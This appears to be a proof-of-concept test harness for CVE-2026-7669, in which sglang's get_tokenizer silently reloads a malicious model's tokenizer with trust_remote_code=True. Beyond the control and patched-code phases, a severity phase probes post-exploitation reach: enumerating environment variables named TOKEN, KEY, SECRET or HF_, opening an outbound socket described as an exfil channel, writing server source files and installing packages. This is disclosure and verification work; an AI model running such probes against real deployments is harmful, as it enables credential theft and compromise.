README.md
Rendering markdown...
"""
PoC for CVE-2026-7669.
Pins all versions and verifies them at runtime via SHA256 of the vulnerable
file and of the 12-line override block. Aborts with exit 3 if anything has
drifted from the pinned target before any vulnerability test runs.
Phases:
1 transformers + False (control)
1b patched sglang + False (isolates the cause to lines 898-909)
2 real sglang + False (the bug)
2b patched sglang + True (proves the patch is surgical)
3 real sglang + False, slow tokenizer mode
4 severity context for C:H/I:H/A:H
Exit codes:
0 confirmed
1 not triggered
2 false positive (transformers itself executed tokenizer.py)
3 pinned-version preflight failed
"""
import datetime
import hashlib
import importlib
import importlib.machinery
import importlib.util
import inspect
import io
import json
import logging
import os
import shutil
import subprocess
import sys
import types
PROOF_FILE = "/tmp/sglang_poc_proof.txt"
MODEL_DIR = "/poc/malicious_model"
LEDGER_FILE = "/tmp/poc_claim_ledger.json"
PINNED_FILE = "/poc/pinned_versions.json"
SOURCE_FILE = "/sglang_source/python/sglang/srt/utils/hf_transformers_utils.py"
HF_DYNAMIC_MODULE_CACHE = os.path.expanduser("~/.cache/huggingface/modules")
LEDGER = []
def claim(claim_id, description, status, evidence=""):
assert status in ("PASS", "FAIL", "NA"), status
LEDGER.append({
"id": claim_id,
"desc": description,
"status": status,
"evidence": evidence,
"ts": datetime.datetime.now().isoformat(),
})
marker = {"PASS": "[PASS]", "FAIL": "[FAIL]", "NA": "[ N/A]"}[status]
print(f" {marker} {claim_id}: {description}")
if evidence:
print(f" -> {evidence}")
def write_ledger():
with open(LEDGER_FILE, "w") as f:
json.dump({
"generated": datetime.datetime.now().isoformat(),
"total": len(LEDGER),
"passed": sum(1 for c in LEDGER if c["status"] == "PASS"),
"failed": sum(1 for c in LEDGER if c["status"] == "FAIL"),
"na": sum(1 for c in LEDGER if c["status"] == "NA"),
"claims": LEDGER,
}, f, indent=2)
print(f"\n[*] Claim ledger written to {LEDGER_FILE}")
def preflight():
print("=" * 72)
print(" PREFLIGHT")
print("=" * 72)
with open(PINNED_FILE) as f:
pinned = json.load(f)
fail = False
py_ver = sys.version.split()[0]
if py_ver.startswith(pinned["python_version_prefix"]):
claim("PRE-1", f"Python version starts with {pinned['python_version_prefix']}",
"PASS", f"runtime={py_ver}")
else:
claim("PRE-1", f"Python version starts with {pinned['python_version_prefix']}",
"FAIL", f"runtime={py_ver}")
fail = True
try:
import transformers
tf_ver = transformers.__version__
except Exception as e:
claim("PRE-2", f"transformers=={pinned['transformers_version']}",
"FAIL", f"import error: {e}")
write_ledger()
sys.exit(3)
if tf_ver == pinned["transformers_version"]:
claim("PRE-2", f"transformers=={pinned['transformers_version']}",
"PASS", f"runtime={tf_ver}")
else:
claim("PRE-2", f"transformers=={pinned['transformers_version']}",
"FAIL", f"runtime={tf_ver}")
fail = True
if not os.path.exists(SOURCE_FILE):
claim("PRE-3", f"sglang source present at {SOURCE_FILE}",
"FAIL", "file not found")
write_ledger()
sys.exit(3)
with open(SOURCE_FILE, "rb") as f:
file_bytes = f.read()
file_sha = hashlib.sha256(file_bytes).hexdigest()
if file_sha == pinned["hf_transformers_utils_sha256"]:
claim("PRE-3", "hf_transformers_utils.py SHA256 matches pinned",
"PASS", f"sha256={file_sha}")
else:
claim("PRE-3", "hf_transformers_utils.py SHA256 matches pinned",
"FAIL", f"runtime={file_sha} expected={pinned['hf_transformers_utils_sha256']}")
fail = True
file_lines = file_bytes.decode().split("\n")
if len(file_lines) - 1 == pinned["hf_transformers_utils_lines"]:
claim("PRE-4", "hf_transformers_utils.py line count matches pinned",
"PASS", f"lines={len(file_lines) - 1}")
else:
claim("PRE-4", "hf_transformers_utils.py line count matches pinned",
"FAIL", f"runtime={len(file_lines) - 1} expected={pinned['hf_transformers_utils_lines']}")
fail = True
block_first = pinned["vuln_block_first_line"]
block_last = pinned["vuln_block_last_line"]
block = "\n".join(file_lines[block_first - 1:block_last])
block_sha = hashlib.sha256(block.encode()).hexdigest()
if block_sha == pinned["vuln_block_sha256"]:
claim("PRE-5", f"Vulnerable block (lines {block_first}-{block_last}) SHA256 matches pinned",
"PASS", f"sha256={block_sha}")
else:
claim("PRE-5", f"Vulnerable block (lines {block_first}-{block_last}) SHA256 matches pinned",
"FAIL", f"runtime={block_sha} expected={pinned['vuln_block_sha256']}")
fail = True
stub_gpu_modules()
from sglang.srt.utils.hf_transformers_utils import get_tokenizer
sig = inspect.signature(get_tokenizer)
default_trc = sig.parameters["trust_remote_code"].default
if default_trc == pinned["expected_default_trust_remote_code"]:
claim("PRE-6", f"get_tokenizer() default trust_remote_code == {pinned['expected_default_trust_remote_code']}",
"PASS", f"default={default_trc}")
else:
claim("PRE-6", f"get_tokenizer() default trust_remote_code == {pinned['expected_default_trust_remote_code']}",
"FAIL", f"default={default_trc}")
fail = True
actual_src = get_tokenizer.__code__.co_filename
if actual_src == SOURCE_FILE:
claim("PRE-7", "imported get_tokenizer file path matches pinned source",
"PASS", f"path={actual_src}")
else:
claim("PRE-7", "imported get_tokenizer file path matches pinned source",
"FAIL", f"runtime={actual_src} expected={SOURCE_FILE}")
fail = True
if fail:
print("\n[!] PREFLIGHT FAILED. Refusing to run vulnerability tests.")
write_ledger()
sys.exit(3)
print("\n[OK] Preflight passed.\n")
return pinned
_STUB_MODULES = [
"cuda_python", "flashinfer", "flashinfer_python", "sglang_kernel",
"quack_kernels", "xgrammar", "torch_memory_saver", "flash_attn_4",
"flash_attn", "vllm", "nvidia", "nvidia.cutlass", "nvidia_cutlass_dsl",
"sglang.srt.layers", "openai_harmony", "torchcodec",
"smg_grpc_servicer", "apache_tvm_ffi", "llguidance",
]
def stub_gpu_modules():
for mod in _STUB_MODULES:
if mod not in sys.modules:
fake = types.ModuleType(mod)
fake.__spec__ = importlib.machinery.ModuleSpec(mod, None)
fake.__version__ = "0.0.0"
sys.modules[mod] = fake
def clean():
if os.path.exists(PROOF_FILE):
os.remove(PROOF_FILE)
if os.path.isdir(HF_DYNAMIC_MODULE_CACHE):
shutil.rmtree(HF_DYNAMIC_MODULE_CACHE, ignore_errors=True)
def clear_tokenizer_cache():
to_del = [
k for k in list(sys.modules)
if "malicious" in k.lower()
or k.startswith("transformers_modules")
or (k.startswith("tokenizer") and "transformers" not in k)
]
for k in to_del:
del sys.modules[k]
class _Trace:
def __init__(self):
self.calls = []
def reset(self):
self.calls.clear()
TRACE = _Trace()
_TRACE_INSTALLED = False
_TRACE_DEPTH = {"n": 0}
def install_autotokenizer_trace():
# Idempotent. Module-level flag because classmethod descriptors break
# function-attribute checks for "already installed".
global _TRACE_INSTALLED
if _TRACE_INSTALLED:
return
from transformers import AutoTokenizer
original = AutoTokenizer.from_pretrained
depth = _TRACE_DEPTH
@classmethod
def traced(cls, *args, **kwargs):
# Record only outer-level calls. Transformers recurses internally
# for sub-tokenizers; nested calls are not what sglang chose to do.
is_outer = depth["n"] == 0
depth["n"] += 1
trc = kwargs.get("trust_remote_code", "<not-passed>")
path = args[0] if args else "<no-arg>"
result = None
exc = None
try:
result = original.__func__(cls, *args, **kwargs)
return result
except BaseException as e:
exc = e
raise
finally:
depth["n"] -= 1
if is_outer:
TRACE.calls.append({
"idx": len(TRACE.calls),
"path": str(path),
"trust_remote_code": trc,
"returned_type": type(result).__name__ if result is not None else None,
"exception": type(exc).__name__ if exc is not None else None,
})
AutoTokenizer.from_pretrained = traced
_TRACE_INSTALLED = True
class _LogCapture:
def __init__(self):
self.buffer = io.StringIO()
self.handler = logging.StreamHandler(self.buffer)
self.handler.setLevel(logging.DEBUG)
def install(self, logger_name):
log = logging.getLogger(logger_name)
log.setLevel(logging.DEBUG)
log.addHandler(self.handler)
log.propagate = True
def reset(self):
self.buffer.seek(0)
self.buffer.truncate(0)
def getvalue(self):
return self.buffer.getvalue()
LOG = _LogCapture()
def install_logger_capture():
root = logging.getLogger()
root.setLevel(logging.DEBUG)
root.addHandler(LOG.handler)
LOG.install("sglang")
LOG.install("sglang.srt.utils.hf_transformers_utils")
def get_patched_tokenizer_func():
# Build a copy of hf_transformers_utils.py with lines 898-909 stripped
# and load it as a standalone module.
with open(SOURCE_FILE) as f:
src = f.read()
out = []
skip = False
for line in src.split("\n"):
if "TokenizersBackend" in line and "type(tokenizer).__name__" in line:
skip = True
out.append(" # [PATCHED OUT FOR CONTROL TEST]")
continue
if skip:
stripped = line.lstrip()
if stripped and not line.startswith(" "):
skip = False
out.append(line)
else:
out.append(" # [PATCHED OUT]")
else:
out.append(line)
patched_path = "/tmp/patched_hf_transformers_utils.py"
with open(patched_path, "w") as f:
f.write("\n".join(out))
spec = importlib.util.spec_from_file_location("patched_utils", patched_path)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod.get_tokenizer
def phase_header(num, title):
bar = "-" * 72
print(f"\n{bar}\n PHASE {num}: {title}\n{bar}")
def main():
print("=" * 72)
print(" CVE-2026-7669 PoC")
print("=" * 72)
preflight()
install_autotokenizer_trace()
install_logger_capture()
if not os.path.isdir(MODEL_DIR):
print(f"[!] {MODEL_DIR} not found. Run setup_model.py first.")
write_ledger()
sys.exit(3)
with open(f"{MODEL_DIR}/tokenizer_config.json") as f:
tc = json.load(f)
print(f"[*] Malicious model at {MODEL_DIR}")
print(f"[*] tokenizer_config.json: {json.dumps(tc)}\n")
from sglang.srt.utils.hf_transformers_utils import get_tokenizer
src_text = inspect.getsource(get_tokenizer)
if "TokenizersBackend" not in src_text:
claim("SRC-1", "Imported get_tokenizer source contains TokenizersBackend retry",
"FAIL", "not found in source")
write_ledger()
sys.exit(3)
claim("SRC-1", "Imported get_tokenizer source contains TokenizersBackend retry",
"PASS", f"file={get_tokenizer.__code__.co_filename}")
# PHASE 1
phase_header("1", "transformers + False (control)")
clean()
clear_tokenizer_cache()
LOG.reset()
TRACE.reset()
from transformers import AutoTokenizer
p1_type = None
try:
tok = AutoTokenizer.from_pretrained(MODEL_DIR, trust_remote_code=False)
p1_type = type(tok).__name__
except Exception as e:
p1_type = f"EXCEPTION:{type(e).__name__}"
p1_executed = os.path.exists(PROOF_FILE)
print(f" trace: {TRACE.calls}")
print(f" return: {p1_type} proof_file_written={p1_executed}")
if p1_executed:
claim("PHASE-1", "transformers respects trust_remote_code=False (no payload exec)",
"FAIL", "proof file written; bug is in transformers, not sglang")
write_ledger()
sys.exit(2)
claim("PHASE-1", "transformers respects trust_remote_code=False (no payload exec)",
"PASS", f"return={p1_type} traced_calls={len(TRACE.calls)}")
# PHASE 1b
phase_header("1b", "patched sglang (lines 898-909 removed) + False")
clean()
clear_tokenizer_cache()
LOG.reset()
TRACE.reset()
install_autotokenizer_trace()
patched_get_tokenizer = get_patched_tokenizer_func()
p1b_type = None
try:
tok = patched_get_tokenizer(MODEL_DIR, trust_remote_code=False)
p1b_type = type(tok).__name__
except Exception as e:
p1b_type = f"EXCEPTION:{type(e).__name__}"
p1b_executed = os.path.exists(PROOF_FILE)
p1b_trace = list(TRACE.calls)
print(f" trace: {p1b_trace}")
print(f" return: {p1b_type} proof_file_written={p1b_executed}")
if p1b_executed:
claim("PHASE-1b", "Patched sglang (without override block) respects False",
"FAIL", "proof file written even with override block removed")
write_ledger()
sys.exit(2)
claim("PHASE-1b", "Patched sglang (without override block) respects False",
"PASS", f"return={p1b_type} traced_calls={len(p1b_trace)}")
if len(p1b_trace) == 1:
claim("PHASE-1b-mech", "Patched function makes exactly 1 from_pretrained call",
"PASS", f"calls={len(p1b_trace)} trc_values={[c['trust_remote_code'] for c in p1b_trace]}")
else:
claim("PHASE-1b-mech", "Patched function makes exactly 1 from_pretrained call",
"FAIL", f"calls={len(p1b_trace)} (expected 1)")
# PHASE 2
phase_header("2", "real sglang + False (the bug)")
clean()
clear_tokenizer_cache()
LOG.reset()
TRACE.reset()
install_autotokenizer_trace()
p2_type = None
try:
tok = get_tokenizer(MODEL_DIR, trust_remote_code=False)
p2_type = type(tok).__name__
except Exception as e:
p2_type = f"EXCEPTION:{type(e).__name__}"
p2_executed = os.path.exists(PROOF_FILE)
p2_trace = list(TRACE.calls)
print(f" trace: {p2_trace}")
print(f" return: {p2_type} proof_file_written={p2_executed}")
if p2_executed:
claim("PHASE-2", "Real sglang executes tokenizer.py despite caller False",
"PASS", f"return={p2_type} proof_file_written")
else:
claim("PHASE-2", "Real sglang executes tokenizer.py despite caller False",
"FAIL", f"return={p2_type}")
if len(p2_trace) >= 2:
first, second = p2_trace[0], p2_trace[1]
first_ok = (first["trust_remote_code"] is False
and first["returned_type"] == "TokenizersBackend")
second_ok = (second["trust_remote_code"] is True
and second["returned_type"] == "MaliciousTokenizer")
if first_ok and second_ok:
claim("PHASE-2-mech",
"Trace proves: 1st call(False)->TokenizersBackend, 2nd call(True)->MaliciousTokenizer",
"PASS", f"call0={first} call1={second}")
else:
claim("PHASE-2-mech",
"Trace proves: 1st call(False)->TokenizersBackend, 2nd call(True)->MaliciousTokenizer",
"FAIL", f"first_ok={first_ok} second_ok={second_ok} trace={p2_trace}")
else:
claim("PHASE-2-mech", "Trace proves the two-call override pattern",
"FAIL", f"trace had only {len(p2_trace)} calls")
log_text = LOG.getvalue()
override_lines = [
l for l in log_text.split("\n") if l.strip()
and "trust_remote_code" in l.lower()
]
if not override_lines:
claim("PHASE-2-silent",
"No log line mentions trust_remote_code during the override (DEBUG capture)",
"PASS", f"captured {len(log_text)} chars; 0 mention trust_remote_code")
else:
claim("PHASE-2-silent",
"No log line mentions trust_remote_code during the override (DEBUG capture)",
"FAIL", f"matched: {override_lines[:3]}")
# PHASE 2b
phase_header("2b", "patched sglang + True (patch is surgical)")
clean()
clear_tokenizer_cache()
LOG.reset()
TRACE.reset()
install_autotokenizer_trace()
p2b_type = None
try:
tok = patched_get_tokenizer(MODEL_DIR, trust_remote_code=True)
p2b_type = type(tok).__name__
except Exception as e:
p2b_type = f"EXCEPTION:{type(e).__name__}"
p2b_executed = os.path.exists(PROOF_FILE)
print(f" trace: {TRACE.calls}")
print(f" return: {p2b_type} proof_file_written={p2b_executed}")
if p2b_executed and p2b_type == "MaliciousTokenizer":
claim("PHASE-2b",
"Patched sglang + explicit True still loads the model (patch is surgical)",
"PASS", f"return={p2b_type}")
else:
claim("PHASE-2b",
"Patched sglang + explicit True still loads the model (patch is surgical)",
"FAIL", f"return={p2b_type} executed={p2b_executed}")
# PHASE 3
phase_header("3", "real sglang + False + tokenizer_mode='slow'")
clean()
clear_tokenizer_cache()
LOG.reset()
TRACE.reset()
install_autotokenizer_trace()
p3_type = None
try:
tok = get_tokenizer(MODEL_DIR, trust_remote_code=False, tokenizer_mode="slow")
p3_type = type(tok).__name__
except Exception as e:
p3_type = f"EXCEPTION:{type(e).__name__}"
p3_executed = os.path.exists(PROOF_FILE)
p3_trace = list(TRACE.calls)
print(f" trace: {p3_trace}")
print(f" return: {p3_type} proof_file_written={p3_executed}")
via_override = (
len(p3_trace) >= 2
and p3_trace[0]["trust_remote_code"] is False
and p3_trace[0]["returned_type"] == "TokenizersBackend"
and p3_trace[1]["trust_remote_code"] is True
and p3_trace[1]["returned_type"] == "MaliciousTokenizer"
)
if p3_executed:
claim("PHASE-3-rce", "Slow mode also achieves code execution",
"PASS", f"return={p3_type}")
else:
claim("PHASE-3-rce", "Slow mode also achieves code execution",
"FAIL", f"return={p3_type} executed={p3_executed}")
if via_override:
claim("PHASE-3-via-override",
"Slow mode reaches RCE via the SAME 898-909 override path",
"PASS", f"trace={p3_trace}")
else:
claim("PHASE-3-via-override",
"Slow mode reaches RCE via the SAME 898-909 override path",
"NA", f"different code path; trace={p3_trace}")
# PHASE 4
phase_header("4", "severity context for C:H/I:H/A:H")
print(" In-process post-exploitation primitives. Not a CVSS Scope claim.\n")
src_path = get_tokenizer.__code__.co_filename
try:
with open(src_path, "a") as f:
f.write("")
claim("SEV-write-sglang", "Process can write to sglang source file (integrity)",
"PASS", f"writable: {src_path}")
except Exception as e:
claim("SEV-write-sglang", "Process can write to sglang source file (integrity)",
"FAIL", str(e))
launch_files = [
"/sglang_source/python/sglang/launch_server.py",
os.path.join(os.path.dirname(os.path.dirname(src_path)), "launch_server.py"),
]
sev_b = "FAIL"
for lf in launch_files:
if os.path.exists(lf):
try:
with open(lf, "a") as f:
f.write("")
sev_b = "PASS"
claim("SEV-write-launchsrv",
"Process can write to launch_server.py (integrity)",
"PASS", f"writable: {lf}")
break
except Exception:
pass
if sev_b == "FAIL":
claim("SEV-write-launchsrv",
"Process can write to launch_server.py (integrity)",
"FAIL", "no launch_server.py path is writable")
try:
tp = os.path.join(MODEL_DIR, ".write_test")
with open(tp, "w") as f:
f.write("x")
os.remove(tp)
claim("SEV-write-model", "Process can write to model dir (integrity)",
"PASS", f"writable: {MODEL_DIR}")
except Exception as e:
claim("SEV-write-model", "Process can write to model dir (integrity)",
"FAIL", str(e))
import socket as _socket
try:
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
s.settimeout(3)
s.connect(("1.1.1.1", 80))
s.send(b"GET / HTTP/1.0\r\nHost: 1.1.1.1\r\n\r\n")
data = s.recv(120)
s.close()
claim("SEV-network", "Process can open outbound TCP (exfil channel)",
"PASS", f"received {len(data)} bytes from 1.1.1.1")
except Exception as e:
claim("SEV-network", "Process can open outbound TCP (exfil channel)",
"FAIL", str(e))
secret_keys = [k for k in os.environ
if any(s in k.upper() for s in ("TOKEN", "KEY", "SECRET", "PASS", "AUTH", "HF_"))]
if secret_keys:
claim("SEV-secrets", "Process can read env secrets (confidentiality)",
"PASS", f"captured: {sorted(secret_keys)}")
else:
claim("SEV-secrets", "Process can read env secrets (confidentiality)",
"NA", "no token/key env vars set in test container")
try:
r = subprocess.run(
[sys.executable, "-m", "pip", "install", "--dry-run", "requests"],
capture_output=True, text=True, timeout=15,
)
if r.returncode == 0:
claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
"PASS", "pip --dry-run succeeded")
else:
claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
"FAIL", f"rc={r.returncode}")
except Exception as e:
claim("SEV-pip", "Process can install arbitrary packages (integrity / supply chain)",
"FAIL", str(e))
uid = os.getuid()
if uid == 0:
claim("SEV-root", "Process running as root (severity multiplier in lmsysorg image)",
"PASS", f"uid={uid}")
else:
claim("SEV-root", "Process running as root (severity multiplier in lmsysorg image)",
"NA", f"uid={uid}")
# PHASE 5
phase_header("5", "HTTP attack surface and chain reachability")
print(" Tests whether an unauth network attacker can reach get_tokenizer")
print(" via the SGLang HTTP API. If yes -> UI:N is justified -> 9.8 Critical.")
print(" If no -> UI:R stands -> 8.8 High.\n")
# AUTH-1..3: pure-function auth decision under default config.
from sglang.srt.utils.auth import decide_request_auth, AuthLevel
d = decide_request_auth(
method="POST", path="/update_weights_from_disk",
authorization_header=None,
api_key=None, admin_api_key=None,
auth_level=AuthLevel.ADMIN_OPTIONAL,
)
if d.allowed:
claim("AUTH-1",
"ADMIN_OPTIONAL endpoint is unauth-reachable when api_key=None and admin_api_key=None",
"PASS", f"decision allowed=True (default ServerArgs config)")
else:
claim("AUTH-1",
"ADMIN_OPTIONAL endpoint is unauth-reachable when api_key=None and admin_api_key=None",
"FAIL", f"decision allowed={d.allowed}")
d = decide_request_auth(
method="POST", path="/update_weights_from_disk",
authorization_header=None,
api_key="secret", admin_api_key=None,
auth_level=AuthLevel.ADMIN_OPTIONAL,
)
if not d.allowed and d.error_status_code == 401:
claim("AUTH-2",
"Positive control: api_key set, no Bearer header -> blocked (401)",
"PASS", f"allowed=False status={d.error_status_code}")
else:
claim("AUTH-2",
"Positive control: api_key set, no Bearer header -> blocked (401)",
"FAIL", f"allowed={d.allowed} status={d.error_status_code}")
d = decide_request_auth(
method="POST", path="/update_weights_from_disk",
authorization_header="Bearer secret",
api_key="secret", admin_api_key=None,
auth_level=AuthLevel.ADMIN_OPTIONAL,
)
if d.allowed:
claim("AUTH-3",
"Positive control: valid Bearer with matching api_key -> allowed",
"PASS", "allowed=True")
else:
claim("AUTH-3",
"Positive control: valid Bearer with matching api_key -> allowed",
"FAIL", f"allowed={d.allowed}")
# CHAIN-1: does any HTTP endpoint reach get_tokenizer post-startup?
# Five independent grep checks across the entire entrypoints/managers tree.
# If ANY of these find a hit, UI:R is in doubt and the result needs review.
SGLANG_ROOT = "/sglang_source/python/sglang/srt"
http_server_path = f"{SGLANG_ROOT}/entrypoints/http_server.py"
tokenizer_manager_path = f"{SGLANG_ROOT}/managers/tokenizer_manager.py"
multi_tok_path = f"{SGLANG_ROOT}/managers/multi_tokenizer_mixin.py"
def read_or_empty(p):
if not os.path.exists(p):
return None
with open(p) as f:
return f.read()
def count_in_handlers(text, pattern):
# Count occurrences in lines that are not blank and not pure comments.
if text is None:
return None
n = 0
for line in text.split("\n"):
stripped = line.strip()
if not stripped or stripped.startswith("#"):
continue
n += line.count(pattern)
return n
http_src = read_or_empty(http_server_path)
tm_src = read_or_empty(tokenizer_manager_path)
mt_src = read_or_empty(multi_tok_path)
# 1a: get_tokenizer( in HTTP server source (not just route handlers, the
# whole module -- if it appears anywhere here it would be reachable from
# request handling code paths).
n_gt_http = count_in_handlers(http_src, "get_tokenizer(")
# 1b: AutoTokenizer.from_pretrained( in HTTP server source. Catches the
# case where a handler bypasses get_tokenizer() and calls transformers
# directly with attacker-controlled paths.
n_ftp_http = count_in_handlers(http_src, "AutoTokenizer.from_pretrained(")
# 1c: instantiations of any class whose __init__ calls get_tokenizer.
# If any of these are constructed inside a route handler it could re-
# fire the override.
instantiation_patterns = ("TokenizerManager(", "TokenizerWorker(",
"TPWorker(", "DetokenizerManager(", "Scheduler(")
n_instantiations = sum(
count_in_handlers(http_src, p) for p in instantiation_patterns
) if http_src is not None else None
# 1d: reload-like methods that reassign self.tokenizer.
# Today's code reassigns self.tokenizer only inside __init__ and the
# init_tokenizer_and_processor helper (called once from __init__).
# Any future method named reload/swap/replace/update/refresh/load_tokenizer
# would constitute a reload primitive and break the UI:R argument.
if tm_src is not None:
suspect_method_names = (
"reload_tokenizer", "swap_tokenizer", "replace_tokenizer",
"update_tokenizer", "refresh_tokenizer", "load_tokenizer",
"set_tokenizer", "reinit_tokenizer", "reset_tokenizer",
)
n_reassign_outside_init = 0
for name in suspect_method_names:
# match "def <name>" or "async def <name>" at any indent level
for line in tm_src.split("\n"):
stripped = line.strip()
if (stripped.startswith(f"def {name}(")
or stripped.startswith(f"async def {name}(")):
n_reassign_outside_init += 1
# And: confirm the one helper that reassigns is called only from __init__
helper_callers = tm_src.count("self.init_tokenizer_and_processor(")
if helper_callers != 1:
n_reassign_outside_init += 1
else:
n_reassign_outside_init = None
# 1e: TokenizerWorker (multi-tokenizer mode) only constructs in bootstrap.
# Verify its __init__ is the only get_tokenizer reach in that file.
n_gt_mtok = count_in_handlers(mt_src, "get_tokenizer(") if mt_src else None
chain_results = {
"1a-get_tokenizer in http_server.py": n_gt_http,
"1b-AutoTokenizer.from_pretrained in http_server.py": n_ftp_http,
"1c-tokenizer-class instantiations in http_server.py": n_instantiations,
"1d-reload-like tokenizer methods (reload/swap/replace/etc)": n_reassign_outside_init,
"1e-get_tokenizer in multi_tokenizer_mixin.py": n_gt_mtok,
}
# http_server.py legitimately constructs TokenizerWorker once at server
# bootstrap (line ~238). Allow exactly one instantiation hit there.
expected_max = {
"1a-get_tokenizer in http_server.py": 0,
"1b-AutoTokenizer.from_pretrained in http_server.py": 0,
"1c-tokenizer-class instantiations in http_server.py": 1,
"1d-reload-like tokenizer methods (reload/swap/replace/etc)": 0,
"1e-get_tokenizer in multi_tokenizer_mixin.py": 0,
}
failures = []
for k, v in chain_results.items():
if v is None:
continue # source not found; covered by NA below
if v > expected_max[k]:
failures.append(f"{k}={v} (max allowed={expected_max[k]})")
if any(v is None for v in chain_results.values()):
claim("CHAIN-1",
"No HTTP-reachable code path invokes get_tokenizer() post-startup",
"NA",
f"one or more sglang source files missing: {chain_results}")
elif failures:
claim("CHAIN-1",
"No HTTP-reachable code path invokes get_tokenizer() post-startup",
"FAIL",
f"hits exceeding expected max: {failures}; full counts: {chain_results}")
else:
claim("CHAIN-1",
"No HTTP-reachable code path invokes get_tokenizer() post-startup",
"PASS",
f"5 independent checks all clean: {chain_results}. "
f"The single allowed instantiation in http_server.py is the bootstrap "
f"TokenizerWorker(server_args, port_args) at server launch.")
# CHAIN-2: explicit verdict on UI:N argument.
auth_bypass = next((c for c in LEDGER if c["id"] == "AUTH-1"), None)
chain_blocked = next((c for c in LEDGER if c["id"] == "CHAIN-1"), None)
if (auth_bypass and auth_bypass["status"] == "PASS"
and chain_blocked and chain_blocked["status"] == "PASS"):
claim("CHAIN-2",
"UI:N is NOT justified for CVE-2026-7669: auth bypass exists but cannot reach get_tokenizer",
"PASS",
"Auth bypass is real (AUTH-1) but no reachable HTTP path invokes "
"get_tokenizer or its preconditions (CHAIN-1, 5 checks). Operator "
"must choose the model_path at launch_server invocation. "
"UI:R stands. CVSS 8.8 High is the correct floor.")
else:
claim("CHAIN-2",
"UI:N reachability verdict",
"NA",
f"AUTH-1={auth_bypass['status'] if auth_bypass else 'missing'} "
f"CHAIN-1={chain_blocked['status'] if chain_blocked else 'missing'}")
print("\n" + "=" * 72)
print(" SUMMARY")
print("=" * 72)
print()
rows = [
("Phase 1 transformers + False", p1_type, p1_executed),
("Phase 1b PATCHED sglang + False", p1b_type, p1b_executed),
("Phase 2 REAL sglang + False", p2_type, p2_executed),
("Phase 2b PATCHED sglang + True", p2b_type, p2b_executed),
("Phase 3 REAL sglang + False (slow)", p3_type, p3_executed),
]
for label, t, exe in rows:
print(f" {label:42s} return={t!s:30s} exec={exe}")
confirmed = (p2_executed and not p1_executed and not p1b_executed)
passed = sum(1 for c in LEDGER if c["status"] == "PASS")
failed = sum(1 for c in LEDGER if c["status"] == "FAIL")
na = sum(1 for c in LEDGER if c["status"] == "NA")
print(f"\n Claims: {passed} PASS / {failed} FAIL / {na} N/A / {len(LEDGER)} TOTAL")
print()
print(" CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H = 8.8 High")
write_ledger()
print()
print("=" * 72)
if confirmed and failed == 0:
print(" *** VULNERABILITY CONFIRMED -- ALL CLAIMS BACKED ***")
print("=" * 72)
sys.exit(0)
elif confirmed:
print(" VULNERABILITY CONFIRMED but some claims FAILED, inspect ledger")
print("=" * 72)
sys.exit(0)
else:
print(" VULNERABILITY NOT CONFIRMED")
print("=" * 72)
sys.exit(1)
if __name__ == "__main__":
main()